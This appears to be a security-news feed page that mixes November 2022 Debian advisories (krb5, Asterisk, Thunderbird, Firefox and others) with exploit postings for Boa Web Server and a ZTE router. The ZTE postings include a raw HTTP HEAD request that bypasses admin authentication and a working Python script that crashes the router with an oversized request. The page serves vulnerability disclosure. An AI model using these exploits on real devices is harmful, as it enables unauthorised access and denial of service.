Debian Linux Security Advisory 5286-1 - Greg Hudson discovered integer overflow flaws in the PAC parsing in krb5, the MIT implementation of Kerberos, which may result in remote code execution (in a KDC, kadmin, or GSS or Kerberos application server process), information exposure (to a cross-realm KDC acting maliciously), or denial of service (KDC or kadmind process crash).

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5286-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoNovember 19, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : krb5CVE ID         : CVE-2022-42898Debian Bug     : 1024267Greg Hudson discovered integer overflow flaws in the PAC parsing inkrb5, the MIT implementation of Kerberos, which may result in remotecode execution (in a KDC, kadmin, or GSS or Kerberos application serverprocess), information exposure (to a cross-realm KDC actingmaliciously), or denial of service (KDC or kadmind process crash).For the stable distribution (bullseye), this problem has been fixed inversion 1.18.3-6+deb11u3.We recommend that you upgrade your krb5 packages.For the detailed security status of krb5 please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/krb5Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmN42JdfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Ts8Q//XhOs3bCQ+xCaIy0cXiNxk4JwzjvBuBdWb5gdmavqO/yS31IfaM3s7WlVA6Y9g00qGjhtPyHbDTTu68gYQv5EuoVFZjYA3M51vdM+PxRN6po0QMvANAHhp1owGbFkEflZblMqPHMsMuDt3C6D2hr+5aCOyNY4V20BJuLOkoKa8RBtxKo0Lcq1j5V2PjLgX+dEvaz6ORpBGdNENmZFAwgllB1pXMoobLLJWLsaEvUrl6pQhwXRs+s5LHKrhAvhHnacShPNVgHq6uJ5s0PGsXlf/BeN2hWzQzgj16My+x3VbVc6TCHv5sD5L615DiwXwC4sNIl1KYYd04Fnyi87Tpnp7fowyfgluPYLUAGX7srilCpmb8XBKeUHwlxGLWTYvlECryucUOWFMph6K/aHTIIItraqeFCQsGDcPa5x//LsF4RcfPt49u6jcig9e6koCej6+DrBIvf8vDUyyDB8V4kk2jN4pzeTjpMiKAY8WBnBxQwfGGCGAu3FEoOkijtxbLje+1DsgKivwEiakgg6rcabQ6yZmuK0Aspi/kw8U55ecr7lntBM03nfb8yrnfgDGWEaRkAAhEft80ajaC7Ym1tveDaq8FAiA4uk07FgOVF+iO3XX77zwrVuh2SPlsaeTC7AnRYIfqy6emRHLAVG9SJP+WMSiggi1SOEQaL1AN5YirQ=dMbH-----END PGP SIGNATURE-----

Debian Security Advisory 5286-1

Boa Web Server versions 0.94.13 through 0.94.14 fail to validate the correct security constraint on the HEAD HTTP method allowing everyone to bypass the Basic Authorization mechanism.

    # Exploit Title: Boa Web Server 0.94.13-0.94.14 Authentication Bypass# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://github.com/gpg/boa# CVE: N/A # Tested on: Debian 5.18.5Description :Boa Web Server Versions from 0.94.13 - 0.94.14 fail to validate thecorrect security constraint on the HEAD http method allowing everyoneto bypass the Basic Authorization Mechanism.Culprit :if (!memcmp(req->logline, "GET ", 4))req->method = M_GET;else if (!memcmp(req->logline, "HEAD ", 5))/* head is just get w/no body */req->method = M_HEAD;else if (!memcmp(req->logline, "POST ", 5))req->method = M_POST;else {log_error_doc(req);fprintf(stderr, "malformed request: \"%s\"\n", req->logline);send_r_not_implemented(req);return 0;}The req->method = M_HEAD; is being parsed directly  on the  response.cfile, looking at how the method is being implemented for one of theresponse codes :/* R_NOT_IMP: 505 */void send_r_bad_version(request * req){    SQUASH_KA(req);    req->response_status = R_BAD_VERSION;    if (!req->simple) {        req_write(req, "HTTP/1.0 505 HTTP Version Not Supported\r\n");        print_http_headers(req);        req_write(req, "Content-Type: " HTML "\r\n\r\n"); /* terminateheader */    }    if (req->method != M_HEAD) {        req_write(req,                  "<HTML><HEAD><TITLE>505 HTTP Version NotSupported</TITLE></HEAD>\n"                  "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTPversions "                  "other than 0.9 and 1.0 "                  "are not supported in Boa.\n<p><p>Version encountered: ");        req_write(req, req->http_version);        req_write(req, "<p><p></BODY></HTML>\n");    }    req_flush(req);}Above code condition indicates that if (req->method != M_HEAD)  thereforeif the the requested method does not equal to M_HEAD thenreq_write(req,                  "<HTML><HEAD><TITLE>505 HTTP Version NotSupported</TITLE></HEAD>\n"                  "<BODY><H1>505 HTTP Version Not Supported</H1>\nHTTPversions "                  "other than 0.9 and 1.0 "                  "are not supported in Boa.\n<p><p>Version encountered: ");        req_write(req, req->http_version);        req_write(req, "<p><p></BODY></HTML>\n");    }So if the method actually contains the http method of HEAD it's beingpassed  for every function that includes all the response code methods.

Boa Web Server 0.94.13 / 0.94.14 Authentication Bypass

ZTE ZXHN-H108NS router with firmware version H108NSV1.0.7u_ZRD_GR2_A68 suffers from an authentication bypass vulnerability when alternate HTTP methods are leveraged.

    # Exploit Title: Router ZTE-H108NS - Authentication Bypass# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/# Firmware: H108NSV1.0.7u_ZRD_GR2_A68# CVE: N/A # Tested on: Debian 5.18.5Description :When specific http methods are listed within a security constraint,then only thosemethods are protected. Router ZTE-H108NS defines the following httpmethods: GET, POST, and HEAD. HEAD method seems to fall under a flawedoperation which allows the HEAD to be implemented correctly with everyResponse Status Code.Proof Of Concept :Below request bypasses successfully the Basic Authentication, andgrants access to the Administration Panel of the Router.HEAD /cgi-bin/tools_admin.asp  HTTP/1.1Host: 192.168.1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: SESSIONID=1cd6bb77Upgrade-Insecure-Requests: 1Cache-Control: max-age=0

ZTE ZXHN-H108NS Authentication Bypass

ZTE ZXHN-H108NS router with firmware version H108NSV1.0.7u_ZRD_GR2_A68 remote stack buffer overflow exploit that causes a denial of service condition.

    # Exploit Title: Router ZTE-H108NS - Stack Buffer Overflow (DoS)# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/# Firmware: H108NSV1.0.7u_ZRD_GR2_A68# Usage: python zte-exploit.py <victim-ip> <port># CVE: N/A # Tested on: Debian 5.18.5#!/usr/bin/python3import sysimport socketfrom time import sleephost = sys.argv[1]  # Recieve IP from userport = int(sys.argv[2])  # Recieve Port from userjunk = b"1500Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae"* 5buffer = b"GET /cgi-bin/tools_test.asp?testFlag=1&Test_PVC=0&pingtest_type=Yes&IP=192.168.1.1"+ junk + b"&TestBtn=START HTTP/1.1\r\n"buffer += b"Host: 192.168.1.1\r\n"buffer += b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0)Gecko/20100101 Firefox/91.0\r\n"buffer += b"Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"buffer += b"Accept-Language: en-US,en;q=0.5\r\n"buffer += b"Accept-Encoding: gzip, deflate\r\n"buffer += b"Authorization: Basic YWRtaW46YWRtaW4=\r\n"buffer += b"Connection: Keep-Alive\r\n"buffer += b"Cookie:SID=21caea85fe39c09297a2b6ad4f286752fe47e6c9c5f601c23b58432db13298f2;_TESTCOOKIESUPPORT=1; SESSIONID=53483d25\r\n"buffer += b"Upgrade-Insecure-Requests: 1\r\n\r\n"print("[*] Sending evil payload...")s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((host, port))s.send(buffer)sleep(1)s.close()print("[+] Crashing boom boom ~ check if target is down ;)")

ZTE ZXHN-H108NS Stack Buffer Overflow / Denial Of Service

Debian Linux Security Advisory 5285-1 - Multiple security vulnerabilities have been found in Asterisk, an Open Source Private Branch Exchange. Buffer overflows and other programming errors could be exploited for information disclosure or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5285-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
November 17, 2022                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : asterisk  
CVE ID         : CVE-2021-37706 CVE-2021-43299 CVE-2021-43300 CVE-2021-43301  
                 CVE-2021-43302 CVE-2021-43303 CVE-2021-43804 CVE-2021-43845  
                 CVE-2021-46837 CVE-2022-21722 CVE-2022-21723 CVE-2022-23608  
                 CVE-2022-24763 CVE-2022-24764 CVE-2022-24786 CVE-2022-24792  
                 CVE-2022-24793 CVE-2022-26498 CVE-2022-26499 CVE-2022-26651  
Debian Bug     : 1014998 1018073 1014976

Multiple security vulnerabilities have been found in Asterisk, an Open Source  
Private Branch Exchange. Buffer overflows and other programming errors could be  
exploited for information disclosure or the execution of arbitrary code.

Special care should be taken when upgrading to this new upstream release.  
Some configuration files and options have changed in order to remedy  
certain security vulnerabilities. Most notably the pjsip TLS listener only  
accepts TLSv1.3 connections in the default configuration now. This can be  
reverted by adding method=tlsv1_2 to the transport in pjsip.conf. See also  
https://issues.asterisk.org/jira/browse/ASTERISK-29017.

For the stable distribution (bullseye), these problems have been fixed in  
version 1:16.28.0~dfsg-0+deb11u1.

We recommend that you upgrade your asterisk packages.

For the detailed security status of asterisk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/asterisk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmN2qoFfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeR0pQ/+Kr+FWFeFyrkFTyVv5BGBJug+EvZzzC2JZoI/TNsiAWQi/BZTQJ0pmdZr  
EHokqN7Z35EqZW6sj5aypdK7bOv4N+uv6P59xROk1KjEEG6XttGJ2BUvffWYWEXo  
k6+ou/yfAxU72Ufd1eOcMtjyGeN0CljmemIJ5Cywpnaw8YArP+VzRK2NEth0gCmJ  
TAfSvIPFaS7jB6fEg8KESOpmvtlqEJUh5sjP2t+OOEc3AoNBBuj4ZC44SQ1nif6k  
jEbmLFnJYQF8dP+IasZ3SY80N+BeuGiylZQ6w1ZvuYuUAK3jhHQ3CJvTQ4sEqNQV  
Zva6t0kHOEKVxKg412oEpQ0ihR+EBF/lnECu7iR2HTKk8xteNwio5qeeW/joTAJx  
OTYlHTtERTZIiaHdmV3nmGYgrTLeDHClilCnJrQuyXF+LVHjxBWDh7WS83zSrdIH  
gNP0eZ5UEjrpomf1yKqHVUsji63eSWACdFVXJLACMwpuevq8qgV6zASD+VuUd36r  
foEOKVj+FIHehWSef9pP48Na8bOn0EDVqtZEPOjE6o8Y8PjgSf7BSNogppZncldw  
VREox9NsxGM9hSVh3lVBWL8lT76HQVzXjfXXXoIEFDiGokNRV/dNTuhhb/mh0zxr  
VTKBboC6ijQVCdVQ7UdGFnoVXOWW2gy8sdam40ELBUCGDD5XI7Aêjm  
-----END PGP SIGNATURE-----

Debian Security Advisory 5285-1

Debian Linux Security Advisory 5284-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5284-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 17, 2022                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2022-45403 CVE-2022-45404 CVE-2022-45405 CVE-2022-45406  
                 CVE-2022-45408 CVE-2022-45409 CVE-2022-45410 CVE-2022-45411  
                 CVE-2022-45412 CVE-2022-45416 CVE-2022-45418 CVE-2022-45420  
                 CVE-2022-45421

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the stable distribution (bullseye), these problems have been fixed in  
version 1:102.5.0-1~deb11u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmN2hR8ACgkQEMKTtsN8  
TjYgsBAAtlBgOGNYLD7cA+7VDQ5fqbkl/2ncwl5PgrX3+r8d0AF5MIyUkmB4hNar  
i5ACP6ahYkDGRie+7HjgiyTDhCVdM6afZ+xyyTAnkvCU0FLcIBLPy9L7+Kywx7d2  
bGV9dsy3oFHOXf1gcqsIawh2myIFEp4ocNC2V1cKRmWqf9bQjc9mzoc0YXewgsMw  
k8zCPZF8n89RMx3k62xvXiCzMlowJR2SV5d2elwFGViosGZQSKAB+PAI3Ub7GV+G  
nrg8V3w57Co2/LcZBUaoFUAsBBWyHpdXNg2IlEOWBdVzdF0yGVlwsi5nso7BJmeq  
+rZp4SPkNRw3WW1w7ccDa+Op9z9OMMY2BYRVV5R4L6gySVyKpgaa3KMmpUm+zWjt  
CO96AhHWMxJJtoghuHVTgy69u8gYKQ21sRojgrqiUzDLYW8UKC34rhrYMPa0InbO  
sUj8IhaDc2Eh4e8LwcbNsJ/8m3zaKKA/qzTmlxRr76mAXBlvY/zIE7ftBcbufbyG  
0TuGi0g2TUKyRAiSIkHJwp/0RaXlhn2hFItIKiXUbv0+34nI6RF+xLFL7F5WwUG9  
hwAc+LbSdup0dGwk9prBUtNK2IAodoIM5/gm+7lUqWnjJlxobqJtNfMzgrHjA5Ni  
6IL34dlalxaCTZvIO+E8ySjg1B8BipAvegUWcs6K7JBe8XydDWs=V2Rf  
-----END PGP SIGNATURE-----

Debian Security Advisory 5284-1

Debian Linux Security Advisory 5283-1 - Several flaws were discovered in jackson-databind, a fast and powerful JSON library for Java.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5283-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
November 17, 2022                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : jackson-databind  
CVE ID         : CVE-2020-36518 CVE-2022-42003 CVE-2022-42004  
Debian Bug     : 1007109

Several flaws were discovered in jackson-databind, a fast and powerful JSON  
library for Java.

CVE-2020-36518

    Java StackOverflow exception and denial of service via a large depth of  
    nested objects.

CVE-2022-42003

    In FasterXML jackson-databind resource exhaustion can occur because of a  
    lack of a check in primitive value deserializers to avoid deep wrapper  
    array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled.

CVE-2022-42004

    In FasterXML jackson-databind resource exhaustion can occur because of a  
    lack of a check in BeanDeserializerBase.deserializeFromArray to prevent use  
    of deeply nested arrays. An application is vulnerable only with certain  
    customized choices for deserialization.

For the stable distribution (bullseye), these problems have been fixed in  
version 2.12.1-1+deb11u1.

We recommend that you upgrade your jackson-databind packages.

For the detailed security status of jackson-databind please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/jackson-databind

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmN2F+5fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeTcpQ//VTj9dn4OgfxhkETwsSvSNpSXbF3qdV2l7S4L7Bz9TWpdpUxR+FtnI+wF  
/j6w9o/hlanB/LoPR9Dphy3Mbz90Rp3/6T4or5IW6zWvLn5FoXMKuqnhJULxP1ae  
91zUOi0U/v+2zr1t0vDh2eFOF4UwDcgoXVMkiUtsRml59EhsgvHPT7xtxq4/DkwJ  
zR3MO0eRgXgFmxdannGen01IPb5Jld1u86SJyOWCAJrJOM/8BCyozIL+AqtK7qZt  
BBYPa7zGWkCGW9qEZtYb/1qq0oHWL9xT8LAoaSBTzOhvg8DD6MyNQf25Z1fsWGHC  
f8ohPMbjYvuImK8moQTkyQr8oOWM0wAu0wYIHz7ds2XkdjakEgCx0UIa9Ah19ezE  
sD9BI/HOV7W19f+N8vcDU4qfr/qNFVh1PEmRR/D6oPnDd9DmlkuEesK+3v5M6nk7  
67WXiQ8jMNrj50H2xZHjApwWhaHhkeK3eZMRZOUpkEvIffVlRHPkKA/e+kD3df8e  
ubR+cwK4m0LYB+wzYJUc22JuCC4WB5incrZ8923kkbLw6STOYarlZEyHScEcAgfN  
z/cPZgL7vYM8/3FYHJuBzCYC3Wjgm8aP9tQ2M8VhFidQdOfvOPDI2uPzvhDM2CZ8  
GUcvHF2JrE5STz2nQvLEbC+b3YKFjPnk1d/HO3CHZmBlK08k+ic=Q/nd  
-----END PGP SIGNATURE-----

Debian Security Advisory 5283-1

Debian Linux Security Advisory 5279-2 - Several vulnerabilities were discovered in Wordpress, a web blogging tool. They allowed remote attackers to perform SQL injection, create open redirects, bypass authorization access, or perform Cross-Site Request Forgery (CSRF) or Cross-Site Scripting (XSS) attacks. The wordpress package released in DSA-5279-1 had incorrect dependencies that could not be satisfied in Debian stable. This update corrects the problem.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5279-2                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondNovember 17, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : wordpressDebian Bug     : 1007005 1018863 1022575 1024249The wordpress package released in DSA-5279-1 had incorrectdependencies that could not be satisfied in Debian stable: this updatecorrects the problem. For reference, the original advisory text isprovided here again:  Several vulnerabilities were discovered in Wordpress, a web blogging  tool. They allowed remote attackers to perform SQL injection, create  open redirects, bypass authorization access, or perform Cross-Site  Request Forgery (CSRF) or Cross-Site Scripting (XSS) attacks.For the stable distribution (bullseye), this problem has been fixed inversion 5.7.8+dfsg1-0+deb11u2.We recommend that you upgrade your wordpress packages.For the detailed security status of wordpress please refer toits security tracker page at:https://security-tracker.debian.org/tracker/wordpressFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmN13KoACgkQEL6Jg/PVnWSnyggAvAS8Crzgp8xW8FvZ20pEz0uXm8oW+5sUR7U+c6vsUPXBa2yT+pLNyCGnSs9ffvl+IVnfZEHK70PvK61thKS9yhtse0fy25HljMnsBBSzMtjZEwZOHGpERNRWYf7Cm5ubIlKumKLodGh+Ecun01DRawfG/W4V+sBnDZWGdn9+B9K6q7vYLRDowshisdJczvrRn2vr88V+LLzbgVDv3M1WcM+dbyEOOtxY29ELuHODgafZNIiMyjxpy3RIiZg5c2uS4RxojN61TxKpD2ewdSRrqAy51SspUSMZIV9l2hQkhMfOm/8x1MLAWVO0v/PaS8NsyR1P454NCwhRRmNbJ5252w==hTKc-----END PGP SIGNATURE-----

Debian Security Advisory 5279-2

Debian Linux Security Advisory 5282-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, information disclosure, spoofing or bypass of the SameSite cookie policy.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5282-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 16, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2022-45403 CVE-2022-45404 CVE-2022-45405 CVE-2022-45406                 CVE-2022-45408 CVE-2022-45409 CVE-2022-45410 CVE-2022-45411                 CVE-2022-45412 CVE-2022-45416 CVE-2022-45418 CVE-2022-45420                 CVE-2022-45421Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, information disclosure, spoofing or bypass of the SameSite cookiepolicy.For the stable distribution (bullseye), these problems have been fixed inversion 102.5.0esr-1~deb11u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmN1MS0ACgkQEMKTtsN8TjbLmBAAvNyETXc0dcwyCQIi/l6KVCLVwzQ8na8zSbrZZGzhebA7WKqeryy8O4f/8qv/chi7chHIlSY9aHkw65fDklAIkKomXUi+E58yvuSa1/DyYBGpQMoWrzHE4hAqs+VuZ/FwY/QiNeOXo0q44PuT/cjBY9LEUciJSywEK/YI0fPDG+F1VbaCK0EOvw7Zxi+VxVCkN6UIF7g0Rr3eibTWKgZi/EHrMgtA4UYg5ml6INVo306azZlDtTfZHympU48OKweMBEWpk0/f6rHmpTuWPWsuzLlpECeBRj4OdJOjmnjprhKJxE4KhHCJkYfVOLBh0SPjIM8k6bgzgXhD3Lc62xE2mqfDHYkIhMtm60r9GZbJzlEht8qeYLtlibfpm+IGx/RJDeuQJTv5jzsXto/lY4zThl/++E/30ecH7ynqj1R3394BAd9rW2O2rWcrWyas8Wa5Qpt7R+/OULq0OEAflT9m4HY3unflxIvmyTSINjryyKFe5Ns4uWB3E5sDBcnV4hqY/NOkUBVaZEhqmL9bvMvtviwj0eDzJBqVgOUxcy+IiT6aCCC4Dnr/CH3Odv7KHHpexKIIT80/uPNZPv2d5nNZXW5JO4ycD7lrZktjCOmXBHkJ2UJiQ3EiGJF6POIOInrEikwV7DqY1ix4uKbvl42xrsa7rZUYHWylFOS9gnFcJOk=5Vwd-----END PGP SIGNATURE-----

Debian Security Advisory 5282-1

Red Hat Security Advisory 2022-8506-01 - Red Hat Satellite is a systems management tool for Linux-based infrastructure. It allows for provisioning, remote management, and monitoring of multiple Linux deployments with a single centralized tool. Issues addressed include code execution, cross site scripting, denial of service, remote SQL injection, and traversal vulnerabilities.

Tag

#debian